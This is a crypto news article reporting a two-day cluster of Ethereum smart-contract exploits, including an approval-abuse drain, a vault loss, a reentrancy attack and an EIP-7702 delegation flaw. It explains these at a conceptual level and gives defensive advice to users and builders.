Ethereum has seen a concentrated wave of smart-contract attacks, with security monitors tracking more than $1.5 million in losses across four incidents in roughly 48 hours. The activity followed a CertiK Alert update and separate monitoring from GoPlus Security, which grouped the incidents around approvals, third-party vault exposure, reentrancy, and arbitrary call execution.
The largest tracked loss came from an Onchain aggregator-related contract, where an attacker drained about $983,000 after abusing a missing access-control check in an execute() function. That incident involved a victim address with a pre-existing unlimited yvWETH approval, allowing the attacker to pull 384.67 yvWETH and later unwind the position into roughly 429 ETH.
The same cluster included a TradingProtocol-linked third-party vault incident with about $398,000 in losses, a BCB contract attack tied to reentrancy that cost about $39,800, and a QNT reserve-pool drain worth about $124,900. Together, the cases show how quickly small design gaps can turn into liquid losses when approvals, vault permissions, and external calls are exposed.
The yvWETH attack stands out because it did not need a fresh approval from the victim during the exploit transaction. The risk already existed because the victim had granted unlimited approval to the vulnerable contract. Once the contract allowed unauthorized execution, the attacker could convert an old permission into an immediate drain path.
That pattern keeps showing up across DeFi because approvals are treated as normal user friction rather than a live balance-sheet risk. A wallet may approve a router, vault, aggregator, or experimental contract once, then leave that allowance active for months. If the approved contract later exposes a callable function, loses access-control assumptions, or routes execution incorrectly, the old approval can become the attacker’s settlement layer.
The TradingProtocol-related vault incident appears to fit the same broader risk category: custody logic and third-party contract dependencies can expose funds even when the core protocol is not directly exploited. Until a full technical postmortem is published, the safer framing is that the loss involved a connected vault contract rather than a confirmed compromise of every related TradingProtocol component.
The QNT case adds a newer Ethereum-specific concern. SlowMist tracked a flawed EIP-7702 account setup that allowed 1,988.5 QNT, worth about 54.93 ETH, to be drained from a reserve pool. The issue centered on an administrator externally owned account that delegated code to a BatchExecutor contract through EIP-7702. That BatchExecutor then allowed a BatchCall contract without proper permission control, leaving the batch() function open to arbitrary external calls.
EIP-7702 gives externally owned accounts the ability to set code execution behavior through authorization tuples. The feature improves account flexibility, but weak delegation design can create dangerous call paths if developers treat upgraded EOAs like ordinary wallets without modeling the new execution surface.
The QNT exploit does not mean EIP-7702 itself is broken. It shows that permissionless batch execution, delegated account logic, and admin-controlled reserve pools need stricter review before they handle real liquidity.
The BCB incident shows that older vulnerability classes still matter. Reentrancy attacks exploit contracts that make external calls before safely updating internal state. If a contract allows repeated entry into sensitive logic before balances, shares, or withdrawal records are finalized, attackers can loop the same action and drain more value than intended.
The loss in the BCB case was smaller than the yvWETH and vault incidents, but the mechanism is still important. Reentrancy has been one of DeFi’s best-known attack classes for years, which makes each new example a reminder that audit coverage, state-transition ordering, and emergency controls remain essential even for smaller contracts.
The four-incident cluster shows a market where exploit windows are shrinking. Attackers can scan contracts, test permissions, route funds, and convert assets rapidly once a weakness becomes visible. AI-assisted tooling may add even more pressure by reducing the time between vulnerability discovery and exploit execution.
For users, the direct defense is approval hygiene: revoke unused allowances, avoid unlimited approvals where caps are available, and separate high-value storage wallets from experimental DeFi activity. For builders, the lesson is stricter permission design around execute(), batch(), vault withdrawal logic, and any function that can route arbitrary external calls.
Ethereum liquidity remains deep, but deep liquidity also makes successful exploits easier to monetize. That is why this wave matters beyond the $1.5 million headline: the same mechanics can scale quickly when exposed permissions meet larger balances.
The post Ethereum Smart Contract Attacks Top $1.5M In Two-Day Security Wave appeared first on Crypto Adventure.
